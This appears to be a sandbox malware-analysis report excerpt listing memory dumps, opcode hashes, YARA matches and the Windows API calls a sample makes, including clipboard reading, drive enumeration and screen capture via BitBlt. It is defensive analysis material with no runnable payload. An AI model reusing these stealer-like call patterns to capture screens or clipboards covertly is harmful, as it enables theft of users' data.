                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction ID: 338d8b000e9c5abdc89c18bb4f96062389e8d81af7492381600e4912b2720483
                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction Fuzzy Hash: D1D097605087A00E4B088D3894A083BFBE4E943252B0854AEE0C5E3004D224EC018258
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                • Instruction ID: 9da16000a40fc99f4b54bc81568aca4b96c1881730151b2648eef55a835ebe77
                                                                                                • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                • Instruction Fuzzy Hash: 1BC04C69F7C4008A9248CB15EC5053162769BCB254715E029841A53255E2249457890D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                • API String ID: 2832541153-984153585
                                                                                                • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                • API String ID: 2832541153-984153585
                                                                                                • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                • Instruction ID: 296f1e3738ff2ea00cf9f45a34a00c89f4cfee0fac8f9ddbc4908a64e98b4a87
                                                                                                • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                • Instruction Fuzzy Hash: 2B415EB050C7818ED301EF78948931FBFE0AB92318F154A6DE5C986292D67DC54887A7
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DrivesLogical
                                                                                                • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                • API String ID: 999431828-351939610
                                                                                                • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                • Instruction ID: ea53d15c1567c823c3bd70fd31ffe803a8592c0c7ef9e4744c03966fcc670ba6
                                                                                                • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                • Instruction Fuzzy Hash: 9E31DAB46493448FC710DF29C95122BBBB2FFC2724F04991CE5864B720EB799946CB42
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 00796BF0
                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00796C11
                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00796C21
                                                                                                • DeleteObject.GDI32(00000000), ref: 00796C28
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00796C37
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00796C42
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00796C4E
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00796C71
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2843486406-0
                                                                                                • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                • Instruction ID: 5a53d6c2c83b5f697693d0377bb2a26c0de0d4af5a0da296ad3f593791ebc0c2
                                                                                                • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                • Instruction Fuzzy Hash: 44214FB9504310EFE3509F609C49B2B7BF8EB8BB11F014929FA59E2290D77498048B67
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00785411
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: +$e$+$e$XY$E#G
                                                                                                • API String ID: 237503144-1023387988
                                                                                                • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                • Instruction ID: 5c72d7fe294ef78d7ba5075c72d2dc73ef349109aaf9b8e2f0e22f46096dfabc
                                                                                                • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                • Instruction Fuzzy Hash: 5421083424C344AFD3148F65D88175FBBE0EBC5714F25C92CE5A857282D779C80A8F86
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00785B5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: B"@$`J/H$rp
                                                                                                • API String ID: 237503144-3817236508
                                                                                                • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                • Instruction ID: be2442af50bbd9a6993a08d1c1e1e311894d9c89c0b08d0180a84640dc939670
                                                                                                • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                • Instruction Fuzzy Hash: B931CDB0E443489FDB14DFA9D8827DEBBB2EF45700F10012CE441BB295D6B55906CFAA